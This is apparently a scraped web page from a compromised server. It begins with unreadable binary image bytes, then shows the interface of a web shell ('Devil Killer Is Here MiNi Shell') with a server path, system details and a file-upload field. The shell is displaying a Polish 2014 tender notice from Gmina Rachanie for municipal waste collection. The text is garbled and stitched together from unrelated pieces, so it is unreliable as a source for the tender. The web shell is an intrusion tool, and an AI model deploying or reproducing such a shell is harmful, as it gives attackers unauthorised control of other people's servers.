JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141209/403346-N-2014.html

<p class="kh_header"><b>Rachanie: Odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych z terenu Gminy Rachanie w okresie od dnia 15 stycznia 2015r. do dnia 31 grudnia 2015r.</b><br>
<b>Numer ogłoszenia: 403346 - 2014; data zamieszczenia: 09.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Rachanie , ul. Dolna 1, 22-640 Rachanie, woj. lubelskie, tel. 084 6471103, faks 084 6471103.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rachanie.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych z terenu Gminy Rachanie w okresie od dnia 15 stycznia 2015r. do dnia 31 grudnia 2015r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest odbiór i zagospodarowanie odpadów komunalnych od 
     właścicieli nieruchomości zamieszkałych i niezamieszkałych z terenu Gminy Rachanie 
     liczącej 19 miejscowości: Falków, Grodysławice, Grodysławice Kolonia, Józefówka, 
     Kociuba, Kozia Wola, Michalów, Michalów Kolonia, Pawłówka, Rachanie, Rachanie 
     Kolonia, Siemierz, Siemnice, Werechanie, Werechanie Kolonia, Wożuczyn, Wożuczyn
    Cukrownia, Źwiartówek, Źwiartówek Kolonia gromadzonych w sposób selektywny jak i 
    zmieszany.
2.  Wykonawca zobowiązany jest do:
2.1 Zapoznania się z regulaminem utrzymania czystości i porządku w gminie oraz ustalenia
      zgodnie z nim i z Zamawiającym szczegółowych harmonogramów wykonywania usługi 
      (według pkt. 8 niniejszego rozdziału - SIWZ) na cały czas trwania usługi. Harmonogramy 
      należy uzgodnić najpóźniej do dnia podpisania umowy.
2.2 Powiadamiania wszystkich właścicieli nieruchomości o ww harmonogramach, na okresy 
      6 miesięczne z 1 miesięcznym wyprzedzeniem.
2.3 Terminowego i właściwego odbioru odpadów komunalnych z nieruchomości według 
      ustalony harmonogramów.
2.4 Niezwłocznego informowania Zamawiającego i właścicieli nieruchomości o zmianach 
      harmonogramów lub niemożności dostosowania się do ich wykonania.
2.5 Odbioru odpadów wystawionych w pojemnikach przed nieruchomości, wywozu i ich 
      zagospodarowania zgodnie z obowiązującymi przepisami prawa - które to czynności 
      należy wykonywać w dni powszednie od poniedziałku do soboty w godzinach pracy 
      Wykonawcy z zastrzeżeniami;
      a )nie wolno z nieruchomości do jednego samochodu zbierać jednocześnie odpadów
           zmieszanych lub pozostałych z segregacji i surowców wtórnych,
      b)jeżeli odbiór odpadów segregowanych i zmieszanych następuje w tym samym czasie
           Wykonawca wykonuje usługę dwoma samochodami odpowiednio oznakowanymi w 
           tym napisy -odpady komunalne- i  -surowce wtórne- .
2.6 Po opróżnieniu pojemniki ustawić na właściwe miejsce i dokonać sprzątnięcia w
      przypadku rozsypania odpadów.
2.7 Zawarcia umów i okazania ich Zamawiającemu w zakresie przekazywania wszystkich 
      odebranych odpadów od właścicieli nieruchomości zamieszkałych i niezamieszkałych
      zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania
      odpadów komunalnych przeznaczonych do składowania do Regionalnej instalacji do 
      przetwarzania odpadów komunalnych (RIPOK) wskazanej w uchwale w sprawie 
      wykonania (Planu gospodarki odpadami dla województwa Lubelskiego) jako instalacji 
      regionalnej dla Gminy Rachanie oraz innych kontrahentów w zakresie zagospodarowania 
      surowców wtórnych.
2.8 Wykonawca jest zobowiązany do osiągnięcia na obszarze objętym przedmiotem
      zamówienia poziomów recyklingu, przygotowania do ponownego użycia i odzysku frakcji 
      odpadów obejmujących papier, metale, tworzywa sztuczne i szkło wyliczanych zgodnie z
      Rozporządzeniem Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów 
      recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych 
     frakcji odpadów komunalnych ( Dz. U. z 2012 r., poz. 645).
2.9 W przypadku nie osiągnięcia przez Wykonawcę poziomów recyklingu, przygotowania do
      ponownego użycia i odzysku innymi metodami zgodnie z Rozporządzeniem Ministra 
     Środowiska z dnia 29 maja 2012 r. ( Dz. U. z   2012 r., poz. 645) Zamawiający obciąży 
     Wykonawcę karą umowną, a Wykonawca zobowiązuje się naliczoną karę bezspornie
     zapłacić Zamawiającemu.
2.10 Terminowego i właściwego przygotowywania sprawozdań wymaganych przepisami  
         prawa i przekazywania ich Zamawiającemu.
2.11  Naprawienia lub ponoszenia wg wyboru Zamawiającego kosztów naprawy szkód
         wyrządzonych podczas wykonywania usługi wywozu odpadów komunalnych na terenie 
         Gminy Rachanie ( uszkodzenia chodników, ulic, obiektów małej architektury, 
          pojemników itp.).
2.12  Ponoszenia odpowiedzialności za zawinione szkody w majątku Zamawiającego lub 
         osób trzecich w trakcie odbioru odpadów.
3.  Wykonawca po podpisaniu umowy, a przed pierwszym odbiorem odpadów oraz przez cały 
     okres wykonywania zamówienia winien na własny koszt dostarczać właścicielom 
     nieruchomości worki na odpady o kolorystyce opisanej w pkt 3.3 w ilości zgodnej z 
     załącznikiem nr 10. 
3.1 Zamawiający wymaga od Wykonawcy usługi w przypadku gdy właściciel nieruchomości
      będzie zainteresowany i zgłosi taką potrzebę, zaopatrzenia nieruchomości w odpowiednie 
      pojemniki do zbierania odpadów komunalnych na zasadzie odrębnie i wzajemnie 
      ustalonych warunków między właścicielem nieruchomości, a Wykonawcą (umowa 
      sprzedaży, dzierżawy, najmu, użyczenia). Zamawiający nie będzie ponosił z tego tytułu  
      żadnych należności. Ponadto dezynfekcja pojemników należy do właściciela 
      nieruchomości.
3.2  Właściciele nieruchomości gromadzić będą odpady w następujących rodzajach 
       pojemników:
       a) worki o pojemności od 60 litrów do 120 litrów,
       b) pojemniki o pojemności 120 litrów do 240 1itrów, 
       c) kontenery KP-7 o poj. 6500 litrów -7000 litrów,
       d) kosze uliczne 30 litrów - 50 litrów.
3.3  Kolorystyka pojemników do selektywnej zbiórki (worków i pojemników) będzie 
       następująca:
       a) kolor niebieski - papier i tektura
       b) kolor biały - szkło bezbarwne 
       c) kolor zielony - szkło kolorowe
       d) kolor żółty - tworzywa sztuczne,
       e) kolor brązowy - ulegające biodegradacji i zielone
       f ) kolor czarny - pozostałe w tym niesegregowane.
4.    Podstawowe dane o uwarunkowaniach zamówienia:
        a)liczba nieruchomości, z których będą odbierane odpady komunalne wykazane są
           w zestawieniu załączonym do SIWZ ( załącznik Nr 9 do SIWZ ),
        b) liczba pojemników, w które powinny być wyposażone nieruchomości, wykazane są
           w zestawieniu załączonym do SIWZ  ( załącznik Nr 10 do SIWZ ), (w przeliczeniu na 
           jeden rodzaj odpadu komunalnego zmieszanego),
        c) Ilość odpadów komunalnych odebranych od właścicieli nieruchomości z terenu 
           Gminy Rachanie w okresie 12 miesięcy ( tj. od 01.10.2013r. do 30.09.2014r. )
           określona jest w zestawieniu załączonym do SIWZ ( załącznik Nr 11 do SIWZ ),
        d)inne dane charakteryzujące uwarunkowania zamówienia podaje zestawienie załączone 
           do SIWZ ( załącznik Nr 12 do SIWZ ).
5.   Wykonawcy wraz z zawarciem umowy zostanie przekazana szczegółowa dokumentacja
      według zestawień roz. II pkt. 4 ( Załączniki nr 9 i 10 do SIWZ), którą należy uznać za
      dokumentację wyjściową do stworzenia bazy właścicieli nieruchomości. W trakcie 
      realizacji zadania baza ta będzie podlegała modyfikacjom ze względu na zmianę
      właścicieli nieruchomości, wielkości wytwarzanych odpadów czy też powstawania nowych 
       obiektów na  nieruchomościach, gdzie będą wytwarzane odpady komunalne lub ich likwidacji.
6.   Ilość wytworzonych odpadów jak i inne dane wymienione w zestawieniach z pkt. 4 nie są
      zależne od Zamawiającego. Ustalone ilości będą ulegały zmianom stosownie do
      rzeczywistej ilości nieruchomości, ilości mieszkańców, ilości i rodzaju odpadów 
        wytworzonych przez właścicieli nieruchomości.
7.    Wykonawca zobowiązany jest do odbioru i zagospodarowania całej masy odpadów 
       komunalnych przekazanych przez właścicieli nieruchomości gromadzonych w sposób 
       selektywny oraz odpadów zmieszanych.
8.    Wykonawca   jest   zobowiązany   realizować   usługę   odbioru   i   zagospodarowania 
       odpadów komunalnych według niżej określonych warunków:
8.1  Częstotliwość i sposób odbioru odpadów komunalnych z nieruchomości odbywać się 
       będzie, zależnie od rodzaju zabudowy i rodzaju odpadu oraz zgodnie z regulaminem 
       utrzymania czystości i porządku w gminie.
8.1.1  zabudowa jednorodzinna
          na terenie zabudowy jednorodzinnej obowiązywać będzie gromadzenie odpadów w 
          systemie pojemnikowo - workowym:
         a)  niesegregowane (zmieszane) odpady komunalne gromadzone będą w pojemnikach o
              pojemności 120 litrów lub 240 litrów lub w workach o pojemności 60 litrów lub 
              120   litrów.
              Częstotliwość odbioru z nieruchomości - 1 raz w miesiącu.
           b)  segregowane - papier, tektura, szkło, metal, tworzywa sztuczne, opakowania
              wielomateriałowe, odpady biodegradowalne zielone oraz pozostałości sortowania,
              przeznaczone do składowania gromadzone będą w pojemnikach o pojemności 
              120 litrów lub 240 litrów lub w workach o pojemności 60 litrów lub 120 litrów.
             Częstotliwość odbioru z nieruchomości:
               1)  metal - co najmniej raz w roku,
              2)  papier i tektura - co najmniej dwa razy w roku,
              3)  plastik i szkło - co najmniej raz na kwartał,
8.1.2  zabudowa wielorodzinna
          na terenie zabudowy wielorodzinnej obowiązywać będzie gromadzenie odpadów w 
          systemie mieszanym workowo - pojemnikowym oraz pojemnikowo - kontenerowym:
          a) niesegregowane odpady komunalne gromadzone będą w pojemnikach o pojemności
              1 100 litrów, KP-7
              Częstotliwość odbioru z nieruchomości - co najmniej 1 raz w miesiącu.
          b) segregowane - papier, tektura, szkło, metal, tworzywa sztuczne, opakowania 
              wielomateriałowe ulegających biodegradacji i zielone oraz pozostałości  sortowania,
              przeznaczone do składowania gromadzone będą w pojemnikach o pojemności 
             240 litrów lub 1 100 litrów w workach 60 litrów, 120 litrów. 
             Częstotliwość odbioru z nieruchomości:
             1) metal - co najmniej raz w roku,
             2) papier i tektura - co najmniej dwa razy w roku,
             3) plastik i szkło - co najmniej raz na kwartał,
8.1.3  nieruchomości niezamieszkałe:
            a) na terenie nieruchomości niezamieszkałych ( działalność produkcyjna, usługowa, 
             handlowa i obiekty użyteczności publicznej ) obowiązywać będzie system mieszany: 
             pojemniki, worki, kontenery:
             niesegregowane gromadzone będą w pojemnikach o pojemności 120 litrów,
             240 litrów,  1100 litrów lub KP-7.
             Częstotliwość odbioru z nieruchomości niezamieszkałych - co najmniej 1 raz w
             miesiącu.
          b) segregowane - papier, tektura, szkło, metal, tworzywo sztuczne, opakowania 
             wielomateriałowe, ulegające biodegradacji i zielone oraz pozostałości sortowania,
             przeznaczone do składowania gromadzone będą w pojemnikach o pojemności 
             120 litrów, 240 litrów, 1100litrów lub KP-7.
             Częstotliwość odbioru z nieruchomości niezamieszkałych -
             1) metal - co najmniej raz w roku,
             2) papier i tektura - co najmniej dwa razy w roku,
             3) plastik i szkło - co najmniej raz na kwartał,
8.1.4   warunki wspólne:
              a) odpady budowlane i rozbiórkowe powstałe w wyniku prac niewymagających
              zgłoszenia lub pozwolenia na budowę
              - bezpośrednio od właścicieli nieruchomości z nieruchomości, zgromadzonych w
                kontenerze dostarczonym przez Wykonawcę na żądanie,
            b) detergenty i odbierane będą poprzez wystawianie tych 
               odpadów przez właścicieli przed swoimi nieruchomościami..
                - Częstotliwość odbioru z nieruchomości -1 raz w roku,
           c) meble i odpady wielkogabarytowe odbierane będą poprzez wystawianie tych 
               odpadów przez właścicieli przed swoimi nieruchomościami.
               - Częstotliwość odbioru z nieruchomości -1 raz w roku,
              d) z koszy ulicznych o poj. 30 litrów lub 50 litrów
               Wykazy  ilości   i  rozmieszczenia koszy   i  pojemników   zostaną  przekazane
               Wykonawcy  w  dniu podpisania umowy. 
               - Częstotliwość odbioru z nieruchomości w terenach wiejskich (przystanki
                 autobusowe, parkingi, w świetlicach i remizach, placach zabaw i inne) - według 
                 potrzeb nie rzadziej niż 1 raz w miesiącu. 
            e) leki z aptek na terenie gminy w których znajdują się ustanowione selektywne 
                punkty zbiórki
                - Częstotliwość odbioru - 2 razy w roku w miesiącach marzec i październik.
                  Wykaz aptek Zamawiający przekaże w formie wykazu.
             f) sprzęt elektryczny i elektroniczny, zużyte baterie , zużyte opony i zużyty olej
                 -  Częstotliwość odbioru z nieruchomości -1 raz w roku,
8.2      Wymogi SIWZ wynikające z art. 6 ust. 4 ustawy z dnia 13 września 1996 roku o
           utrzymaniu czystości i porządku w gminach (t. j. Dz. U. z 2013 r. poz. 1399).
8.2.1   Wymogi dotyczące przekazywania odebranych zmieszanych odpadów komunalnych, 
           odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych 
           przeznaczonych do składowania do regionalnych instalacji do przetwarzania odpadów
           komunalnych - art. 6d ust. 4 pkt.l.
           a) Wykonawca zobowiązany jest do przekazywania wszystkich odebranych 
                zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z 
                sortowania przeznaczonych do składowania do Regionalnej instalacji do
                przetwarzania odpadów komunalnych wskazanej w uchwale w sprawie wykonania
                (Planu gospodarki odpadami dla województwa lubelskiego ) jako instalacji 
                regionalnej dla Gminy Rachanie.
           b) Wykonawca zobowiązany jest zagospodarować wszystkie odebrane odpady zebrane
                selektywnie według powszechnie obowiązujących przepisów prawa.
           c) Wykonawca zobowiązany jest do przekazywania selektywnie zebranych odpadów 
                komunalnych do instalacji odzysku i unieszkodliwiania, zgodnie z hierarchią 
                powstępowania z odpadami, określoną w obowiązujących przepisach prawa, w 
                szczególności w ustawie o odpadach z dnia 14 grudnia 2012 r. art. 17, z 
                zastrzeżeniem, że jeżeli przed przekazaniem odebranych selektywnie odpadów do
                instalacji odzysku i unieszkodliwiania zostały one skierowane przez podmiot 
                odbierający odpady do przesortowania, to powstałe pozostałości z sortowania
                - odpady o kodzie 19 12 12 , przeznaczone do składowania, muszą zostać 
                 przekazane do regionalnej instalacji przetwarzania odpadów komunalnych lub 
                 instalacji zastępczych, o których mowa w pkt a.
8.2.2Rodzaje odpadów komunalnych odbieranych selektywnie od właścicieli 
            nieruchomości - art. 6d ust.4 pkt. 2.
            a) W sposób selektywny na nieruchomościach gromadzone będą i odbierane
                następujące odpady komunalne:
                1. papier, tektura (kod odpadu 20 01 01)
                2. szkło (kod odpadu 20 01 02)
                3. tworzywa sztuczne (kod odpadu 20 01 39)
                   4.  metal (kod odpadu 20 01 40)
                  5.  inne niewymienione frakcje zbierane w sposób selektywny 
                    (kod odpadu 20 01 99)
                6. odpady ulegające biodegradacji (kod odpadu 20 01 08)
                7.  detergenty (kod odpadu 20 01 29, 20 01 30) 
                8.  akumulatory (kod odpadu 20 01 34) 
                9.  odpady wielkogabarytowe (kod odpadu 20 03 07)
                10. odpady budowlane i rozbiórkowe (kod odpadu 20 03 99) 
                11. odpady komunalne, niewymienione w innych podgrupach 
                     (kod odpadu 20 03 99)
                12.  leki (kod odpadu 20 01 31, 20 01 32) 
           b) Odpady komunalne niesegregowane powstałe na nieruchomościach oznacza się 
                (kod odpadu 20 03 O1).
8.3    Obowiązek prowadzenia dokumentacji związanej z działalnością objętą zamówieniem 
         - art. 6 d ust. 4 pkt.4
         a) Wykonawca w trakcie realizacji zamówienia ma obowiązek prowadzenia pełnej 
             dokumentacji wymaganej obowiązującymi w danym czasie przepisami prawa, 
             odzwierciedleniem której będą kwartalne sprawozdania.
         b) Sprawozdanie należy przekazać w ustawowym terminie na obowiązującym druku w
             formie elektronicznej na uzgodniony adres poczty elektronicznej i w wersji 
             papierowej na adres Urząd Gminy w Rachaniach.
         c) Sprawozdanie winno być opatrzone datą oraz imieniem i nazwiskiem osoby go
             sporządzającej w imieniu Wykonawcy oraz uzyskać akceptacje osoby reprezentującej
             Wykonawcę.
         d) W celu weryfikacji danych zawartych w sprawozdaniu, o którym mowa wyżej, Wójt
             Gminy Rachanie może zobowiązać Wykonawcę odbierającego odpady komunalne od
             właścicieli nieruchomości do okazania dokumentów sporządzanych na potrzeby
             ewidencji odpadów oraz dokumentów potwierdzających osiągnięcie określonych
             poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi 
             metodami oraz ograniczenia masy odpadów komunalnych ulegających biodegradacji 
             przekazywanych do składowania.
        e)  W przypadku gdy sprawozdanie jest sporządzone nierzetelnie Wójt Gminy
              Rachanie wezwie Wykonawcę, który przekazał sprawozdanie, do jego uzgodnienia 
              lub poprawienia w terminie 14 dni.
8.4   Szczegółowe wymagania stawiane Wykonawcom odbierającym odpady komunalne od 
        właścicieli nieruchomości - art. 6d ust. 4 pkt. 5.
        A) Wykonawca ubiegający się o realizację zamówienia jest obowiązany:
             1)   posiadać bazę magazynowo - transportową, do której ma tytuł prawny
                   usytuowaną w gminie Rachanie lub w odległości nie większej niż 60 km od jej 
                   granic zgodnie z Rozporządzeniem Ministra Środowiska z dnia 11 stycznia
                   2013r., która powinna być wyposażona w:
                    a) miejsca do parkowania pojazdów
                    b) pomieszczenia socjalne dla pracowników
                    c) miejsca do magazynowania selektywnie zebranych odpadów
                    d) legalizowaną samochodową wagę najazdową
                    e) punkt bieżącej konserwacji i naprawy pojazdów
                    f) miejsce do mycia i dezynfekcji pojazdów
                    g)zamawiający dopuszcza zlecenia usług mycia i dezynfekcji pojazdów przez
                       uprawnione podmioty zewnętrzne poza terenem bazy magazynowo -
                       transportowej
              2)   zabezpieczyć teren bazy materiałowo - transportowej przed wstępem osób
                    nieupoważnionych;
              3)   zabezpieczyć miejsca parkowania samochodów przed emisją zanieczyszczeń do 
                    gruntu;
              4)   zabezpieczyć miejsca gromadzenia selektywnie zebranych odpadów
                    komunalnych przed emisją zanieczyszczeń do gruntu oraz zabezpieczyć je przed 
                    działaniem czynników atmosferycznych - a także utrzymywać we właściwym 
                    stanie sanitarno - technicznym;
              5)   wyposażyć teren bazy w urządzenia odprowadzające wody opadowe i ścieki
                    przemysłowe w/g ustawy prawo wodne (Dz. U. z 2012 r. poz. 145);
              6)   posiadać co najmniej 1 pojazd przystosowany do odbierania selektywnie 
                    zebranych odpadów, a także co najmniej 1 pojazd do odbierania zmieszanych
                    odpadów komunalnych oraz co najmniej 1 pojazd do odbierania odpadów bez
                    funkcji kompaktującej, które to wszystkie pojazdy są oznakowane w widocznym
                    miejscu nazwą firmy oraz danymi adresowymi i numerami telefonu Wykonawcy
                    zamówienia;
              7)   po zakończonej pracy parkować pojazdy każdego dnia wyłącznie na terenie bazy;
              8)   zapewnić spełnienie przez pojazdy następujących wymagań:
                     a) pojazdy muszą być zabezpieczone przed rozwiewaniem i rozpylaniem
                         przewożonych odpadów,
                     b) pojazdy muszą być wyposażone w monitoring na systemie pozycjonowania
                         satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i 
                         odczytywanie danych o położeniu pojazdu i miejscach postoju,
                     c) pojazdy muszą być wyposażone w czujniki zapisujące dane o miejscach
                        wyładunku odpadów,
                     d) pojazdy muszą posiadać narzędzia umożliwiające sprzątanie terenu po
                         opróżnieniu pojemników,
                     e) dopuszcza się wyposażenie pojazdów w urządzenia do ważenia odpadów.
              9)  zarejestrować   i   zapewnić   dopuszczenie   do  ruchu   pojazdów  oraz
                   posiadanie  aktualnych   badań technicznych i świadectwa dopuszczenia do ruchu
                   zgodnie z przepisami ustawy o ruchu drogowym. 
         B)  Zamawiający wymaga od Wykonawcy odpowiedniego oznakowania samochodów,
               nazwą firmy i danymi do kontaktu a ponadto umieszczenia napisów adekwatnych do
               przeznaczenia (odpady komunalne) dla odpadów zmieszanych lub pozostałych z 
               segregacji i (surowce wtórne) dla odbioru odpadów segregowanych.

9.  Wykonawca w celu realizacji zamówienia jest zobowiązany stworzyć i przedstawić do 
     akceptacji szczegółowe harmonogramy odbioru odpadów według wymogów roz.II pkt 8
     pkt. 1.1.1 - 1.1.3, najpóźniej do dnia podpisania umowy. Będą one stanowić załącznik do
     umowy. Zamawiający dopuszcza w trakcie, trwania zamówienia zmiany w 
     harmonogramach z przyczyn uzasadnionych, ale tak aby zachować terminy w rozdz. II
     pkt.2 ppkt. 2.
10. Gospodarka odpadami budowlanymi i rozbiórkowymi w sytuacjach, gdzie jest wymagane
      pozwolenie na budowę lub zgłoszenie, nie są przedmiotem niniejszego zamówienia i 
      odbywać się będą w oparciu o odrębne umowy cywilno - prawne zawierane pomiędzy
      właścicielami nieruchomości, a podmiotami uprawnionymi do odbioru i 
      zagospodarowania odpadów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.31.00-9, 90.53.30.00-2, 90.51.10.00-2, 90.51.20.00-9, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium o wartości:
5 000,00 PLN ( słownie: pięć tys. PLN ).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje żadnych wymagań, których spełnienia Wykonawca
      zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż w okresie 3 lat 
     przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest 
     krótszy, to w tym okresie, wykonał należycie co najmniej jedną usługę o charakterze 
     okresowym lub ciągłym odpowiadającą przedmiotowi zamówienia tj. odbiór odpadów 
     komunalnych przez okres co najmniej 12 miesięcy o łącznej masie co najmniej 
     500 Mg.
    Na potwierdzenie wykonania powyższych usług, należy podać ich wartości, 
    przedmiot, daty wykonania i podmioty, na rzecz których usługi zostały wykonane, oraz 
    załączyć dowody, czy usługi zostały wykonane lub są wykonywane należycie. 
    ( np. referencje, opinie lub listy polecające, protokoły odbioru końcowego itp. ).
     Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na 
     podstawie złożonych dokumentów i oświadczeń, według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
